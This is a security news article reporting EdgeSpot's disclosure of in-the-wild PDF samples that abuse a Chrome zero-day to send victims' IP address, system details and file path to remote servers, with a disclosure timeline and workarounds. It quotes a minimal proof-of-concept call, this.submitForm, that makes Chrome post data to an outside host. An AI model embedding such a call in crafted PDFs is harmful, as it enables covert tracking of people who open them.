PDF zero-day samples harvest user data when opened in Chrome

Pierluigi Paganini February 28, 2019

Experts at Exploit detection service EdgeSpot detected several PDF documents that exploit a zero-day flaw in Chrome to harvest user data.

Exploit detection service EdgeSpot spotted several PDF documents that exploit a zero-day vulnerability in Chrome to harvest data on users who open the files through the popular web browser. The experts initially detected the specially-crafted PDF files in December 2018.

When a victim opens the weaponized PDF files with Chrome the document is shown to the users, while the malicious code collects user data in the background and sent it to a remote server under the control of the attackers.

The harvested data includes IP address, operating system and Chrome versions, and the full path of the PDF file on the victim’s system.

“Since late December 2018, EdgeSpot has detected multiple PDF samples in the wild which exploit a Google Chrome zero-day flaw.” reads the analysis published by EdgeSpot.

“The exploited vulnerability allows the sender of the PDF files to track the users and collect some user’s information when they use Google Chrome as a local PDF viewer.”

It is interesting to note, if the victims open the same files with Adobe Reader, nothing happens.

Experts noticed that the data is sent to the remote servers via an HTTP POST requests without requiring any user interaction. The data were sent to one of two domains burpcollaborator[.]net or readnotify[.]com.

malicious PDF chrome zero-day

One of the files analyzed by EdgeSpot, it a weaponized version of a document from Lonely Planet on the history of the Bay Islands in Honduras.

Most of the samples detected by EdgeSpot have a low detection rate on VirusTotal, at the time of writing only two antivirus products are able to detect them.

Experts analyzed the sample and found some suspicious Javascript code in stream-1, then deobfuscated the code and discovered the root is the “this.submitForm()” PDF Javascript API.

“We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal data to google.com.” states the experts.

We decided to release our finding prior to the patch because we think it’s better to give the affected users a chance to be informed/alerted of the potential risk, since the active exploits/samples are in the wild while the patch is not near away.

The experts suggest as a temporary “workaround” to use an alternative PDF reader application for viewing received PDF documents locally or disconnect computer from the Internet when open PDF documents in Chrome.

Below the timeline

  • 2018.12.26 Finding reported to Google
  • 2019.02.12 More samples were detected during the period
  • 2019.02.14 After multiple communications with the Chrome team, we were informed the issue will be landed on official Chrome in late April. Chrome team were informed about this blog post release
  • 2019.02.26 Blog post released
[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – zero-day, hacking)

[adrotate banner=”5″]

[adrotate banner=”13″]

you might also like

leave a comment